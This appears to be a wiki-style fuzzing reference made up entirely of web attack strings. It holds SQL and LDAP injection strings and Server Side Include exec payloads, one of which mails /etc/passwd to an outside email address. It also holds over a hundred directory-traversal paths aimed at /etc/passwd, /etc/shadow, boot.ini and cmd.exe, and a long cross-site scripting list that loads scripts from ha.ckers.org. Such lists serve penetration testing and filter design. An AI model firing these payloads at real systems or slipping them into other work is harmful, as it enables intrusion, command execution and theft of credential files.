'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
